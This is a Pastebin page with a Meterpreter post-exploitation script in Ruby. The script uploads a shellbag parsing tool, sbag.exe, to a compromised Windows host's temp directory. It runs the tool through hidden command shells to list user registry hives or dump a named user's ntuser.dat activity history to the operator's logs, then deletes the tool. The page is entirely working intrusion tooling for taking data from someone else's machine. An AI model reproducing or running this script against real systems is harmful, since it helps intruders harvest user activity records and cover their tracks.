Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #
- # Meterpreter script for uploading shellbag
- #
- # Author(s): James Fitts and Jason Haddix ++ Josh Grunzweig
- #------------------------------------------------------------
- ################## Variable Declarations ##################
- info = @client.sys.config.sysinfo
- # File to upload to the target host
- file = File.join(Msf::Config.install_root, 'data', 'sbag.exe')
- # Create Filename info to be appened to downloaded files
- filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
- # Create a directory for the logs
- logs = ::File.join(Msf::Config.log_directory, 'scripts', 'shellbag', Rex::FileUtils.clean_path(info['Computer'] + filenameinfo))
- @logfol = logs
- # Create the log directory
- ::FileUtils.mkdir_p(logs)
- # Options
- @@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],
- "-u" => [ false, "Uploads sbag.exe to the C:\\WINDOWS\\TEMP directory"],
- "-l" => [ false, "Lists the user hives available"],
- "-d" => [ true, "Dumps the user hive to a file."],
- "-r" => [ false, "Removes sbag.exe from the system"]
- )
- #-----------------------------------------------------------
- def usage
- print_line("Shellbag Meterpreter Script")
- print_line("Usage: shellbag <options>")
- print(@@exec_opts.usage)
- raise Rex::Script::Completed
- end
- #-----------------------------------------------------------
- def upload(session, file)
- tmp = session.fs.file.expand_path("%TEMP%")
- print_status("Uploading sbag.exe ...")
- session.fs.file.upload_file("#{tmp}\\sbag.exe","#{file}")
- print_status("sbag.exe uploaded as #{tmp}\\sbag.exe ...")
- end
- #-----------------------------------------------------------
- def list()
- print_status("Receiving data...")
- tmp = session.fs.file.expand_path("%TEMP%")
- r = session.sys.process.execute("cmd.exe /c #{tmp}\\sbag.exe -livehives", nil, {'Hidden' => true,'Channelized' => true})
- output = ""
- while(d = r.channel.read)
- output << d
- end
- r.channel.close
- r.close
- return output
- end
- #-----------------------------------------------------------
- def dump(username)
- print_status("Recieving data...")
- tmp = session.fs.file.expand_path("%TEMP%")
- r = session.sys.process.execute("cmd.exe /c #{tmp}\\sbag.exe \"c:\\documents and settings\\#{username}\\ntuser.dat\"", nil, {'Hidden' => true,'Channelized' => true})
- output = ""
- while(d = r.channel.read)
- output << d
- end
- r.channel.close
- r.close
- flname = "#{@logfol}/#{username}.txt"
- file_local_write(flname, output)
- print_status("Shellbag data successfully dumped to the logs!")
- end
- #-----------------------------------------------------------
- def remove()
- print_status("Removing sbag.exe from the system...")
- tmp = session.fs.file.expand_path("%TEMP%")
- session.sys.process.execute("cmd.exe /c del #{tmp}\\sbag.exe")
- print_status("sbag.exe removed!")
- end
- ################## MAIN ##################
- hlp = 0
- upl = 0
- lst = 0
- dmp = 0
- username = nil
- rmv = 0
- @@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- when "-u"
- upl = 1
- when "-l"
- lst = 1
- when "-d"
- dmp = 1
- username = val
- when "-r"
- rmv = 1
- end
- }
- if args.length < 1
- usage()
- elsif upl == 1
- upload(session, file)
- elsif lst == 1
- print list()
- elsif rmv == 1
- remove()
- elsif dmp == 1
- dump(username)
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement